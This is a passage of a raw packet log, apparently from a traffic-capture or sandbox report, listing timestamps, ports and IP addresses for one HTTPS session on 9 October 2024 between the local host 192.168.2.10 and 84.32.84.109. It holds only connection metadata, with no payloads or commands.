Oct 9, 2024 16:16:00.160471916 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160521984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.160521984 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.160532951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.160573006 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.203752995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.203847885 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.203912020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.203933001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.203954935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.203962088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.204010963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.204010963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.204020977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.204062939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.204116106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.204123974 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.204792976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.241359949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.241492987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.241580963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.241580963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.241592884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.241620064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.241656065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.241661072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.241703033 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.241718054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.241811991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.241828918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.241852999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.242029905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.242062092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.242126942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.242181063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.242181063 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.242187977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.243407011 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.245575905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.245745897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.245781898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.245791912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.245958090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.245986938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.245986938 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246021032 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246025085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246049881 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246112108 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246117115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246134996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246443987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246479034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246484041 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246536970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246581078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246581078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246587992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246663094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246742964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246748924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246890068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246972084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.246978045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.246998072 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247111082 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.247119904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247226954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.247267962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247328043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.247415066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247755051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247814894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.247814894 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.247823000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247848988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247925997 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.247932911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.247953892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.248058081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.248075008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.248167038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.248230934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.248230934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.248236895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.248270988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.248313904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.248318911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.248380899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.291186094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.291285038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.291321039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.291404009 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.291445017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.291523933 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.291531086 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.291558027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.291619062 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.291619062 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.328844070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.328943014 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.328979015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329051971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.329076052 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329130888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.329176903 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329235077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.329336882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329463005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329473972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.329483032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329529047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.329529047 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.329580069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329792023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.329807043 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.329858065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.333134890 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333195925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.333204031 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333215952 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333261013 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.333275080 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333280087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333333015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.333339930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333344936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333390951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.333395004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333867073 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333904028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333920956 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.333925962 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.333964109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.334485054 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334546089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334556103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.334561110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334640026 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.334654093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334745884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334769964 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.334777117 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334868908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.334892988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334937096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334939957 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.334948063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.334994078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.335150957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335289001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335305929 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.335310936 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335338116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335352898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.335356951 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335407972 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.335431099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.335464001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335513115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.335602045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335675001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.335741997 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.335809946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.379178047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.379303932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.379317999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.379404068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.379451990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.379539967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.379561901 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.379762888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.416558981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.416641951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.416655064 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.416853905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.416903973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.416910887 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.417087078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.417087078 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.417182922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.417390108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.417397022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.417419910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.417674065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.417681932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.417745113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.417748928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.417856932 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.420926094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.420984983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421030045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421118021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421238899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421314955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421314955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421322107 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421344995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421374083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421386957 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421439886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421446085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421494007 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421499014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421623945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421819925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421906948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.421943903 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.421952009 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.422008991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422008991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422086000 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.422192097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422216892 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.422312975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422349930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.422434092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422456980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.422523022 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422564030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.422652960 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422657967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.422895908 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.422979116 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423079967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.423079967 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423101902 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423161983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.423161983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.423213959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423301935 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.423373938 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423448086 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.423501968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423583031 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.423588991 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423609018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.423660040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.423660040 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.467086077 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.467168093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.467204094 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.467228889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.467242002 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.467302084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.467302084 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505300999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505387068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505418062 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505426884 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505526066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505573034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505573034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505579948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505631924 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505652905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505656958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505666018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505714893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505714893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505722046 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505731106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.505938053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.505944014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.506069899 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.508768082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.508841038 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.508886099 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.508892059 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.508908033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.508925915 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.509017944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.509027958 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.509035110 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.509068012 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.509083033 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.509130955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.509603977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.509665966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.509673119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.509748936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.510982990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.511048079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.511053085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.511164904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.511221886 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.511307955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.511312008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.511406898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.511615992 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.511925936 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.511930943 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.511998892 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.513501883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513557911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513571978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513609886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.513609886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.513616085 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513689995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.513690948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513736963 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.513741970 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513780117 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.513794899 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513844967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.513849020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.513969898 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.560369968 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.560440063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.560534000 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.560544014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.560583115 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.560625076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.560625076 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.560631990 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.563431978 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.592977047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593081951 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.593090057 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593101978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593307972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593336105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.593342066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593375921 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.593472004 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593514919 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593535900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.593535900 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.593545914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:00.593700886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.593700886 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:00.596385956 CEST	443	49723	84.32.84.109	192.168.2.10
